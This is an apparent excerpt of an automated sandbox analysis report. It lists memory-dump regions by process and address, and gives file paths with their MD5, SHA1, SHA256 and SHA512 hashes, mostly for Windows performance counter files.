memory/2436-20-0x00000000772C0000-0x0000000077469000-memory.dmp
memory/2436-22-0x0000000140000000-0x0000000140040000-memory.dmp
memory/480-40-0x0000000037300000-0x0000000037310000-memory.dmp
memory/1128-163-0x0000000037300000-0x0000000037310000-memory.dmp
memory/1128-162-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp
memory/820-151-0x0000000000510000-0x000000000053A000-memory.dmp
memory/3028-221-0x0000000002340000-0x0000000002348000-memory.dmp
memory/3028-219-0x000000001B5C0000-0x000000001B8A2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y3HEYY3NXB0XSRSCTWJU.temp
| MD5 | 6ba3787c6ac93c99b47357beb7c74aa8 |
| SHA1 | b14c606859169b3ab9b31a171b9a7b485344b9ce |
| SHA256 | 28fef2bb1b9f2466b97b010133d97b7a32de60a4f9621e4a46087ad0b036092d |
| SHA512 | 72d7e1c07f3365cd28a2a77c7e267d7a895baecdbc464c4dbb291c85b88b88e1e9f0e0424da4dfad451aaa06f5d04519f8bbb277cf7a26d11d0ecdb7df12d531 |
memory/2444-232-0x0000000000460000-0x0000000000472000-memory.dmp
memory/764-149-0x0000000037300000-0x0000000037310000-memory.dmp
memory/764-148-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp
memory/764-147-0x0000000000C80000-0x0000000000CAA000-memory.dmp
memory/680-145-0x0000000037300000-0x0000000037310000-memory.dmp
memory/680-144-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp
memory/680-143-0x00000000005F0000-0x000000000061A000-memory.dmp
memory/480-39-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp
memory/480-38-0x0000000000250000-0x000000000027A000-memory.dmp
memory/428-36-0x0000000037300000-0x0000000037310000-memory.dmp
memory/428-35-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp
memory/428-34-0x0000000000C30000-0x0000000000C5A000-memory.dmp
memory/496-33-0x00000000000D0000-0x00000000000FA000-memory.dmp
memory/428-26-0x0000000000C00000-0x0000000000C23000-memory.dmp
memory/428-24-0x0000000000C00000-0x0000000000C23000-memory.dmp
memory/2436-21-0x00000000771A0000-0x00000000772BF000-memory.dmp
memory/2436-19-0x0000000140000000-0x0000000140040000-memory.dmp
memory/2436-18-0x0000000140000000-0x0000000140040000-memory.dmp
memory/1552-298-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/1552-328-0x0000000000BC0000-0x0000000000BD2000-memory.dmp
memory/1248-327-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2388-523-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2664-536-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2388-628-0x0000000000810000-0x0000000000822000-memory.dmp
memory/2692-706-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2256-723-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/1912-878-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2428-918-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/1912-998-0x0000000000810000-0x0000000000822000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2148-1079-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/984-1265-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/984-1369-0x00000000006A0000-0x00000000006B2000-memory.dmp
memory/320-1442-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2148-1463-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2564-1622-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/1176-1710-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2564-1730-0x0000000000BC0000-0x0000000000BD2000-memory.dmp
memory/1856-1816-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2780-1841-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/1412-2005-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/500-2060-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2092-2196-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/1496-2201-0x0000000000720000-0x0000000000732000-memory.dmp
memory/1204-2405-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2680-2579-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2480-2735-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/1920-3063-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2204-3090-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/988-3559-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2100-3657-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2776-3769-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2812-3964-0x0000000000BC0000-0x0000000000BD2000-memory.dmp
memory/616-4082-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/1164-4183-0x0000000000660000-0x0000000000672000-memory.dmp
memory/1568-4640-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/1568-4752-0x0000000000BC0000-0x0000000000BD2000-memory.dmp
memory/452-4968-0x0000000000410000-0x0000000000422000-memory.dmp
C:\Windows\System32\perfh011.dat
| MD5 | 54c674d19c0ff72816402f66f6c3d37c |
| SHA1 | 2dcc0269545a213648d59dc84916d9ec2d62a138 |
| SHA256 | 646d4ea2f0670691aa5b998c26626ede7623886ed3ac9bc9679018f85e584bb5 |
| SHA512 | 4d451e9bef2c451cb9e86c7f4d705be65787c88df5281da94012bfbe5af496718ec3e48099ec3dff1d06fee7133293f10d649866fe59daa7951aebe2e5e67c1f |
C:\Windows\System32\perfh010.dat
| MD5 | 4623482c106cf6cc1bac198f31787b65 |
| SHA1 | 5abb0decf7b42ef5daf7db012a742311932f6dad |
| SHA256 | eceda45aedbf6454b79f010c891bead3844d43189972f6beeb5ccddb13cc0349 |
| SHA512 | afecefcec652856dd8b4275f11d75a68a582337b682309c4b61fd26ed7038b92e6b9aa72c1bfc350ce2caf5e357098b54eb1e448a4392960f9f82e01c447669f |
C:\Windows\System32\perfc010.dat
| MD5 | d73172c6cb697755f87cd047c474cf91 |
| SHA1 | abc5c7194abe32885a170ca666b7cce8251ac1d6 |
| SHA256 | 9de801eebbe32699630f74082c9adea15069acd5afb138c9ecd5d4904e3cdc57 |
| SHA512 | 7c9e4126bed6bc94a211281eed45cee30452519f125b82b143f78da32a3aac72d94d31757e1da22fb2f8a25099ffddec992e2c60987efb9da9b7a17831eafdf6 |
C:\Windows\System32\perfh00C.dat
| MD5 | 5f684ce126de17a7d4433ed2494c5ca9 |
| SHA1 | ce1a30a477daa1bac2ec358ce58731429eafe911 |
| SHA256 | 2e2ba0c47e71991d646ec380cde47f44318d695e6f3f56ec095955a129af1c2c |
| SHA512 | 4d0c2669b5002da14d44c21dc2f521fb37b6b41b61bca7b2a9af7c03f616dda9ca825f79a81d3401af626a90017654f9221a6ccc83010ff73de71967fc2f3f5b |
C:\Windows\System32\perfc00C.dat
| MD5 | ce233fa5dc5adcb87a5185617a0ff6ac |
| SHA1 | 2e2747284b1204d3ab08733a29fdbabdf8dc55b9 |
| SHA256 | 68d4de5e72cfd117151c44dd6ec74cf46fafd6c51357895d3025d7dac570ce31 |
| SHA512 | 1e9c8e7f12d7c87b4faa0d587a8b374e491cd44f23e13fdb64bde3bc6bf3f2a2d3aba5444a13b199a19737a8170ee8d4ead17a883fbaee66b8b32b35b7577fc2 |
C:\Windows\System32\perfh00A.dat
| MD5 | 7d0bac4e796872daa3f6dc82c57f4ca8 |
| SHA1 | b4f6bbe08fa8cd0784a94ac442ff937a3d3eea0a |
| SHA256 | ce2ef9fc248965f1408d4b7a1e6db67494ba07a7bbdfa810418b30be66ad5879 |
| SHA512 | 145a0e8543e0d79fe1a5ce268d710c807834a05da1e948f84d6a1818171cd4ef077ea44ba1fe439b07b095721e0109cbf7e4cfd7b57519ee44d9fd9fe1169a3e |
C:\Windows\System32\perfc00A.dat
| MD5 | f0ecfbfa3e3e59fd02197018f7e9cb84 |
| SHA1 | 961e9367a4ef3a189466c0a0a186faf8958bdbc4 |
| SHA256 | cfa293532a1b865b95093437d82bf8b682132aa335957f0c6d95edfbcc372324 |
| SHA512 | 116e648cb3b591a6a94da5ef11234778924a2ff9e0b3d7f6f00310d8a58914d12f5ee1b63c2f88701bb00538ad0e42ae2561575333c5a1d63bb8c86863ac6294 |
C:\Windows\System32\perfh009.dat
| MD5 | aecab86cc5c705d7a036cba758c1d7b0 |
| SHA1 | e88cf81fd282d91c7fc0efae13c13c55f4857b5e |
| SHA256 | 9bab92e274fcc0af88a7fdd143c9045b9d3a13cac2c00b63f00b320128dcc066 |
| SHA512 | e0aa8da41373fc64d0e3dc86c9e92a9dd5232f6bcae42dfe6f79012d7e780de85511a9ec6941cb39476632972573a18063d3ecd8b059b1d008d34f585d9edbe8 |
C:\Windows\System32\perfh007.dat
| MD5 | b69ab3aeddb720d6ef8c05ff88c23b38 |
| SHA1 | d830c2155159656ed1806c7c66cae2a54a2441fa |
| SHA256 | 24c81302014118e07ed97eaac0819ecf191e0cc3d69c02b16ecda60ac4718625 |
| SHA512 | 4c7a99d45fb6e90c206439dcdd7cd198870ea5397a6584bb666eed53a8dc36faaac0b9cfc786a3ab4ecbbecc3a4ddd91560246d83b3319f2e37c1ed4bdbec32d |
C:\Windows\System32\perfc007.dat
| MD5 | 19c7052de3b7281b4c1c6bfbb543c5dc |
| SHA1 | d2e12081a14c1069c89f2cee7357a559c27786e7 |
| SHA256 | 14ed6cb3198e80964cbc687a60aed24fb68d1bbd7588f983dc1fc6ae63514b4a |
| SHA512 | 289ca791909882c857014bd24e777fa84b533896508b562051b529d4c27e0d98bc41c801c6384b382f5dc0fa584dc8f713939c636543b0a5cf5ea2b396300f83 |
C:\Windows\System32\perfc011.dat
| MD5 | 045b3a28859ed815f97e17fcebadf523 |
| SHA1 | a3cfaf297b3ef6d2e7ae0e33b9e7a3f212c7c5bd |
| SHA256 | 690ebf33940e7d22aeef120d30cc8b1731b2b18ce0cb4b2db89679735809312c |
| SHA512 | d1836a85871c5c11efc407827bb87af4356297a8c498310de45cb322827082622c56cccee7d22c2e2a2f6894a33589534b9f516736005107571d7efade1e9de5 |
C:\Windows\System32\wbem\Performance\WmiApRpl.h
| MD5 | b133a676d139032a27de3d9619e70091 |
| SHA1 | 1248aa89938a13640252a79113930ede2f26f1fa |
| SHA256 | ae2b6236d3eeb4822835714ae9444e5dcd21bc60f7a909f2962c43bc743c7b15 |
| SHA512 | c6b99e13d854ce7a6874497473614ee4bd81c490802783db1349ab851cd80d1dc06df8c1f6e434aba873a5bbf6125cc64104709064e19a9dc1c66dcde3f898f5 |
C:\Windows\System32\wbem\Performance\WmiApRpl.ini
| MD5 | 46d08e3a55f007c523ac64dce6dcf478 |
| SHA1 | 62edf88697e98d43f32090a2197bead7e7244245 |
| SHA256 | 5b15b1fc32713447c3fbc952a0fb02f1fd78c6f9ac69087bdb240625b0282614 |
| SHA512 | b1f42e70c0ba866a9ed34eb531dbcbae1a659d7349c1e1a14b18b9e23d8cbd302d8509c6d3a28bc7509dd92e83bcb400201fb5d5a70f613421d81fe649d02e42 |
memory/2604-5371-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2604-5469-0x00000000007A0000-0x00000000007B2000-memory.dmp
memory/452-5579-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/1984-5757-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/356-5984-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2548-6000-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/356-6097-0x0000000002090000-0x00000000020A2000-memory.dmp
memory/2224-6310-0x00000000008E0000-0x00000000008F2000-memory.dmp
memory/1932-6528-0x0000000002330000-0x0000000002342000-memory.dmp
memory/2600-6894-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/1144-6988-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/816-7174-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/816-7282-0x0000000000810000-0x0000000000822000-memory.dmp
memory/3016-7460-0x0000000000610000-0x0000000000622000-memory.dmp
memory/2616-7941-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2452-8619-0x0000000002510000-0x0000000002522000-memory.dmp
memory/1880-8798-0x0000000000580000-0x0000000000592000-memory.dmp
memory/840-9281-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2136-9677-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/1512-9699-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2352-9874-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/1852-10307-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2304-10554-0x0000000000290000-0x00000000002FC000-memory.dmp
memory/2092-10756-0x0000000000BD0000-0x0000000000C1E000-memory.dmp
memory/2092-10853-0x0000000000BC0000-0x0000000000BD2000-memory.dmp